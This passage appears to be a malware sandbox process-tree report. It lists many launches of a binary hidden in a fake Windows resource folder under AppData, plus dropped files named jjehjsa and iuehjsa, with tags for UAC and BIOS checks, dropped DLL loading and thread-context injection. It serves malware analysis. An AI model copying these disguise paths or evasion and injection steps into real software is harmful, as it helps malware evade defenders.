C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
PID:2820

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2276

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
PID:2908

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
PID:2140

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:1148

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2940

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:1824

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2488

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:2200

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2804

C:\Users\Admin\AppData\Roaming\jjehjsa
C:\Users\Admin\AppData\Roaming\jjehjsa
2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2796

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
2⤵
- Suspicious use of SetThreadContext
PID:2732

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2476

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
PID:516

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
PID:2084

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
PID:2484

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2692

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2992

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2952

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
PID:2872

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:1744

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
PID:2728

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
PID:1812

C:\Users\Admin\AppData\Roaming\jjehjsa
C:\Users\Admin\AppData\Roaming\jjehjsa
2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2532

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
2⤵
- Suspicious use of SetThreadContext
PID:2620

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2212

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:2868

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:656

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2208

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2628

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2052

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
PID:2300

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:2196

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2296

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2236

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
PID:2492

C:\Users\Admin\AppData\Roaming\jjehjsa
C:\Users\Admin\AppData\Roaming\jjehjsa
2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1568

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
2⤵
- Suspicious use of SetThreadContext
PID:2968

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:956

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2788

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
PID:1232

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
PID:2104

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2112

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:656

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
PID:1740

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
PID:2792

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2624

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
PID:3040

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
PID:2164

C:\Users\Admin\AppData\Roaming\jjehjsa
C:\Users\Admin\AppData\Roaming\jjehjsa
2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3008

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
2⤵
- Suspicious use of SetThreadContext
PID:2600

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2140

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:1988

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2424

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
PID:2896

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2616

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2832

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2244

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:3068

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
PID:2132

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:1732

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
PID:2620

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
2⤵
- Suspicious use of SetThreadContext
PID:2528

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2300

C:\Users\Admin\AppData\Roaming\jjehjsa
C:\Users\Admin\AppData\Roaming\jjehjsa
2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2180

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
PID:2880

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
PID:2848

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2644

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
PID:2868

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2788

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:1956

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2832

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2612

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:3068

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2524

C:\Users\Admin\AppData\Roaming\jjehjsa
C:\Users\Admin\AppData\Roaming\jjehjsa
2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1080

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
2⤵
- Suspicious use of SetThreadContext
PID:2912

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
3⤵
- Suspicious behavior: MapViewOfSection
PID:2932

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:528

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2396

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:3064

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
PID:3040

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2296

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
PID:2196

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
PID:2332

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
PID:2820

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
PID:2532

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2568

C:\Users\Admin\AppData\Roaming\jjehjsa
C:\Users\Admin\AppData\Roaming\jjehjsa
2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
